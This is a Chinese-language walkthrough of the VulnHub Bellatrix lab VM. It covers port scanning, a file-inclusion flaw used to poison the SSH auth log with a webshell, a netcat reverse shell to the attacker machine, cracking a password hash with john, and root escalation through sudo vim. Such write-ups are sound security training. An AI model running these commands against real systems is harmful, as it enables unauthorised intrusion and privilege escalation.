vulnhub之Bellatrix的實踐
今天實踐的是vulnhub的Bellatrix鏡像,
下載地址,https://download.vulnhub.com/hogwarts/Bellatrix.ova,
用workstation導入成功,進行地址掃描,拿到地址192.168.58.143,

接著進行端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.58.143,

看到有http服務,瀏覽器訪問主頁,發現提示php頁面,

再查看源碼,提示了文件包含漏洞,

通過文件包含漏洞查看ssh登錄日志文件,
http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log,

向ssh登錄日志文件里注入webshell,
ssh ''@192.168.58.143,
再次查看ssh登錄日志文件,是看不到已經注入的webshell的,

但其實是注入成功的,后來拿到shell后直接查看ssh登錄日志文件就能看到,

kali攻擊機上開啟反彈shell監聽,nc -lvp 4444,
利用webshell制造反彈shell,
http://192.168.58.143/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.58.131 4444,
kali攻擊機上得到反彈shell,不是root,需要提權,轉成交互式shell,
python3 -c 'import pty; pty.spawn("/bin/bash")',
從當前賬戶文件里發現了一個賬戶和密碼的hash,

在kali攻擊機上使用john破解,
sudo john --wordlist=/usr/share/john/password.lst hash,
得到賬戶密碼,lestrange/ihateharrypotter,

切到lestrange賬戶下,再sudo -l發現vim是root權限的,
老辦法,查找vim的提權方法,

提權,sudo vim -c ':!/bin/sh',成功,id確認是root,
